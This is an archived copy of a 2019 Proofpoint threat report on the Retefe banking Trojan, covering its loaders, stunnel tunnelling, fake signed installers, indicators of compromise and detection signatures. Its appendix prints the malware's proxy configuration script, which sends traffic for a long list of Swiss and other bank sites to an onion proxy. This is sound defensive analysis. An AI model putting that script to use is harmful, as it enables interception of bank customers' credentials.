{
	"id": "8d0dbf90-b33c-4eec-90ef-a9ac866747df",
	"created_at": "2026-04-06T00:14:29.825288Z",
	"updated_at": "2026-04-10T03:20:34.072544Z",
	"deleted_at": null,
	"sha1_hash": "6f17c1a9cbff9c230c78b56d72b853cfd3f8db50",
	"title": "2019: The Return of Retefe | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1462286,
	"plain_text": "2019: The Return of Retefe | Proofpoint US\r\nBy May 02, 2019 Bryan Campbell and the Proofpoint Threat Insight Team\r\nPublished: 2019-05-02 · Archived: 2026-04-05 14:57:38 UTC\r\nOverview\r\nRetefe is a banking Trojan that historically has routed online banking traffic intended for targeted banks through a\r\nproxy instead of the web injects more typical of other bankers. In the past, Retefe campaigns have targeted\r\nAustria, Sweden, and Switzerland, among other regions, such as users of UK online banking sites. Retefe is\r\ngenerally delivered via zipped JavaScript as well as Microsoft Word documents [1].\r\nAlthough Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and\r\nGerman victims in April of 2019 with both a Windows and macOS version.\r\nRetefe’s return to the landscape was marked by several noteworthy changes:\r\nUsing stunnel instead of TOR to secure its proxy redirection and command and control communications\r\nThe use of Smoke Loader rather than sLoad as an intermediate loader\r\nThe abuse of a shareware application known as “Convert PDF to Word Plus 1.0”; this is a Python script\r\nthat has been packaged as an executable using PyInstaller and packed into an archive using the UPX\r\npacking engine.\r\nAbused Shareware as Part of the Retefe Installation Stack\r\nProofpoint researchers identified the abused shareware application in a public malware repository in March 2019.\r\nIt originates from http://lettercreate.com/unipdf/convert-pdf-to-word-plus[.]exe and uses a certificate issued by\r\nDigiCert.\r\nThe CCN is “BULDOK LIMITED/emailAddress=admin@buldoklimited[.]info”.\r\nFigure 1 shows the resulting Python code once the executable has been unpacked, unpackaged, and decompiled.\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 1 of 10\n\nFigure 1: Resulting Python code when convert-pdf-to-word-plus.exe is unpacked, unpackaged, and decompiled.\r\nThe Python script writes two files named convert-pdf-to-word-plus.exe and convert-pdf-to-word-plus_driver.exe\r\nto the %TEMP% directory and executes them.\r\nWe currently believes that the convert-pdf-to-word-plus.exe file is a legitimate installer for the “Convert PDF to\r\nWord Plus” application (Figure 2) and is executed as a decoy.\r\nFigure 2: Convert PDF to Word Plus Installer\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 2 of 10\n\nConvert-pdf-to-word-plus_driver.exe, on the other hand, is malicious and is Retefe’s loader. As can be seen in\r\nFigure 3, the loader extracts 7-Zip and stunnel from its resources then decrypts and executes the main Retefe\r\nJavaScript code.\r\nFigure 3: Retefe Loader\r\nAs shown in the figure above, Retefe extracts stunnel via a compressed archive in place of the usual TOR Socat\r\nproxy. In addition to the use of the decoy abused shareware, this is the most significant observed change to\r\nRetefe’s behavior, along with the use of Smoke Loader.\r\nSmoke Loader Now Bootstraps Retefe\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 3 of 10\n\nOn  April 17, Proofpoint researchers observed a geographically targeted campaign against Switzerland using the\r\nemail lure below (Fig. 4). This campaign used an Object Linking and Embedding (OLE) package to deliver\r\nSmoke Loader.\r\nApproximately two hours following infection, we observed Smoke Loader downloading Retefe with the following\r\nhash:\r\n925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e\r\nFigure 4: Lure document used to drop Smoke Loader, which in turn downloads Retefe\r\nA copy of the Retefe dropper PowerShell script can be downloaded here for further analysis:\r\nhttps://github.com/EmergingThreats/threatresearch/blob/master/retefe/retefedropperapr2019\r\nThis script contains the content required for Retefe persistence, including the scheduled tasks for 7-Zip and the\r\nstunnel secure tunneling software.\r\nSecure Tunneling (stunnel) Replaces Tor\r\nIt is not clear why Retefe’s authors have now deprecated Tor in favor of stunnel. However, we suspect that the use\r\nof a dedicated tunnel rather than Tor makes for a more secure connection because it eliminates the possibility of\r\nsnooping on the hops between Tor nodes. Tor is also a “noisier” protocol and thus would be easier to detect in an\r\nenterprise environment than stunnel, which would appear as any other outbound SSL connection.\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 4 of 10\n\nProxy Information From the Retefe Binary\r\nBelow is a portion of the proxy configuration that lists the online banking sites whose users are targeted by this\r\ninstance of Retefe. The complete proxy configuration is in the appendix.\r\nfunction FindProxyForURL(url, host) {\r\n var proxy = \"PROXY ltro3fxssy7xsqgz.onion:5588;\";\r\n var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch'\r\n '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', .\r\n.\r\n.\r\n.\r\n'*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');\r\n for (var i = 0; i \u003c hosts.length; i++) {\r\n if (shExpMatch(host, hosts[i])) {\r\n return proxy\r\n }\r\n }\r\n return\r\nMalware Masquerading as Adobe Installer Applications\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 5 of 10\n\nFigure 5: macOS Adobe Cloud installer\r\nUnlike the Retefe campaigns targeting Microsoft Windows hosts until December 2018, campaigns targeting\r\nmacOS have continued throughout the first several months of 2019. These campaigns continued to use developer-signed versions of fake Adobe Installers in order to deliver their payloads.\r\nBelow is the signature used to sign the Retefe binary. By using signed binaries, actors attempt to bypass the\r\nmacOS internal Gatekeeper security application, which checks if applications are signed by a valid developer\r\ncertificate before running. The output was created by running the command codesign -dv --verbose=4 on the\r\ninstaller binary.\r\nIdentifier=Ryan_Ltd.Software\r\nFormat=app bundle with Mach-O thin (x86_64)\r\nCodeDirectory v=20200 size=341 flags=0x0(none) hashes=10+3 location=embedded\r\nOSPlatform=36\r\nOSSDKVersion=657920\r\nOSVersionMin=657664\r\nHash type=sha1 size=20\r\nCandidateCDHash sha1=f839edca246ddf3881cb3f2821a900b252330a59\r\nHash choices=sha1\r\nPage size=4096\r\nCDHash=f839edca246ddf3881cb3f2821a900b252330a59\r\nSignature size=8525\r\nAuthority=Developer ID Application: Oleg Kosourov (Q9HZ55M855)\r\nAuthority=Developer ID Certification Authority\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 6 of 10\n\nAuthority=Apple Root CA\r\nTimestamp=Jan 21, 2019, 3:43:51 AM\r\nInfo.plist entries=23\r\nTeamIdentifier=Q9HZ55M855\r\nSealed Resources version=2 rules=12 files=5\r\nInternal requirements count=1 size=180\r\nGatekeeper enforces application integrity by checking the validity of the Developer ID associated with an\r\napplication. When an app is created, it is digitally signed with a certificate and the associated name of the\r\ndeveloper. The notarization status verifies the application is from the identified developer and has not been\r\nchanged. Further changes by Apple in macOS Mojave include app notarization, an additional integrity check for\r\nthe signed application [2].\r\nConclusion\r\nRetefe is unusual in its use of proxies to redirect victims to fake bank pages for credential theft instead of\r\nemploying web injects for man-in-the-browser attacks like most banking Trojans. Developers appear to have\r\nupdated key features of the Trojan and are employing new distribution mechanisms including fake apps and\r\nswitching to Smoke Loader as its intermediate downloader after a fairly lengthy absence from the landscape.\r\nRetefe in particular is noted for changing its proxy configuration, having previously used Profixifier and in 2019\r\nmoving to stunnel. As with many types of malware, developers continue to innovate, identifying new, more\r\neffective ways to infect victims and steal personal information to better monetize their attacks.\r\nReferences\r\n[1] https://www.govcert.admin.ch/blog/33/the-retefe-saga\r\n[2] https://support.apple.com/en-us/HT202491\r\nAcknowledgment\r\nSpecial thanks to @JaromirHorejsi for assistance sourcing samples of Retefe\r\nIndicators of Compromise (IOCs)\r\nIOC IOC Type Description\r\n3d9bd35cc82712e3ec02ccb561633c8ab130348ffae259a35edf927e9c770052 SHA256\r\nFake convert-pdf-to-word-plus.exe\r\n4415cc989396ae301d103d11dd3aa7c90cbf9fb3a7aa49113a410efab8edebe3 SHA256 Legitimate\r\nconvert-pdf-to-https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 7 of 10\n\nword-plus.exe\r\ndcb9ceeedfeb1b5a19f8898cd7c3be8f2afda9ad2ee3afaf12e65c0c07783c8b SHA3256\r\nRetefe Loader\r\n(convert-pdf-to-word-plus_driver.exe)\r\n6750c9224540d7606d3c82c7641f49147c1b3fd0\r\nCertificate\r\nHash\r\nDigiCert\r\nCertificate\r\ne5d05fe5b3ff65fc4c7021908164b9e73b24f95f63c594602680400a48e32845\r\n1a4aa8a7cd6e21e3af77c9035905ac9109d95d11752b095d0fc48e63859cdf49\r\n01bfea6b092c3c6067f0b13a291188537d07de026d53337113b994267b83d85a\r\n92c153772281baf565cdf8dc62fa56208ec2cc01c3d78d206b5c51c162634cc4\r\nd9d9e7cec1d4a33eda01b00e161ed147ae0a3a9a45c92cd926235ec3bbaa8f47\r\n07c53aa5858189c52b8ab30929b3383c0558cf762bd2c312ee2d35a222941c89\r\ne99468f96a3825145a06a418e9ddc5ad8c0124b371df370febb137ac20fed443\r\na0f468a4f1edc8e99225baf58bcfd6b0c280460f177f6b5e2cf2a6b3479536a1\r\n9cf0ac320a3b6a3e3ec894816e976037b9168b114513a5cbcc3b168758499b11\r\na304e2656385f7551ef49e84b673f6ca106ce3e005d36a02db4038f31d5a774f\r\na2b60d8200946bb33bb67d93cbae0b09b8999e9ea44449997f1a499d16091e97\r\n07e5034744d819e59c2ec2bcfa8904cee29d4f9eae210575abfcfb89876fee65\r\n988d04827f8bd7526a0b6f4c5704b19e9bd512d015bc5eda18b41f7f85e239d0\r\n0d5460739d9a2c9460001b31237565ba77de02cdab329b21ad9222899d465f17\r\ne7ab3f221548d6bfd67248fb62ff767224f5ccb4505409e41ff04eb364c461a1\r\n68762eea44ba7fec72405a84bc7af2d9f3cec3ad82f0dae7568e416fa01a1cbb\r\ndbe9bc07f721e383fea0c64cdd222a0d5e9284e2b720f95b92418471e6e64ff9\r\nc81cd3faf9ef1a01697fac4b19e89e8749d9599339bc6f95a48a61794d183a18\r\nSHA256 macOS dmg\r\nfiles\r\nmasquerading\r\nas Adobe\r\ninstaller.\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 8 of 10\n\n06f35768884874be9a76b5235e64f6fed933ed46ea431e29805b2837df58fddb\r\nf3549eab33aaeee003450004a0485b393dd336a7a4c2ea717e08a26e5addc903\r\nhxxp://lettercreate.com/unipdf/convert-pdf-to-word-plus.exe URL\r\nBackdoored\r\napplication\r\n925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e SHA256\r\nSmoke Loader\r\ndownloaded\r\nRetefe\r\na75986c65170c28e5306673fd117c8e47b186895054b6f2681146c09d3f0d107 SHA256\r\nSmokeLoader\r\nDocument\r\nhxxp://www.laserowakasia.pl/wp-rss[.]php\r\nhxxp://racyroyalcoin.com/wp-rss[.]php\r\nhxxp://bizbhutanevents.com/wp-rss[.]php\r\nhxxp://www.kjkpropertysolutions.com/wp-rss[.]php\r\nhxxp://thealtilium.com/wp-rss[.]php\r\nurls\r\nSmokeLoader\r\nc2\r\ne53a9b2a484a052fc47df2a499bf942d350f052054ae9a67bdcc13f46c3d9c5b SHA256 SmokeLoader\r\nET and ETPRO Suricata/Snort Signatures\r\n2835551 ETPRO TROJAN Observed SmokeLoader Style Connectivity Check\r\n2022130 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Retefe CnC)\r\nAppendix\r\nFull proxy configuration\r\nfunction FindProxyForURL(url, host) {\r\n var proxy = \"PROXY ltro3fxssy7xsqgz.onion:5588;\";\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 9 of 10\n\nvar hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch'\r\n'*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',\r\n'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch',\r\n'*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch',\r\n'*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',\r\n'*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch',\r\n'*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',\r\n'*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch',\r\n'*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch',\r\n'*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch',\r\n'*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com',\r\n'*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',\r\n'*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com',\r\n'*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch',\r\n'*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com',\r\n'*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com',\r\n'*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.c\r\n'*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-bauman\r\n'*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch',\r\n'*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen\r\n'*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch',\r\n'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch',\r\n'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.c\r\n'*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mira\r\n for (var i = 0; i \u003c hosts.length; i++) {\r\n if (shExpMatch(host, hosts[i])) {\r\n return proxy\r\n }\r\n }\r\n return\r\nSource: https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nhttps://www.proofpoint.com/us/threat-insight/post/2019-return-retefe\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe"
	],
	"report_names": [
		"2019-return-retefe"
	],
	"threat_actors": [],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775791234,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f17c1a9cbff9c230c78b56d72b853cfd3f8db50.pdf",
		"text": "https://archive.orkl.eu/6f17c1a9cbff9c230c78b56d72b853cfd3f8db50.txt",
		"img": "https://archive.orkl.eu/6f17c1a9cbff9c230c78b56d72b853cfd3f8db50.jpg"
	}
}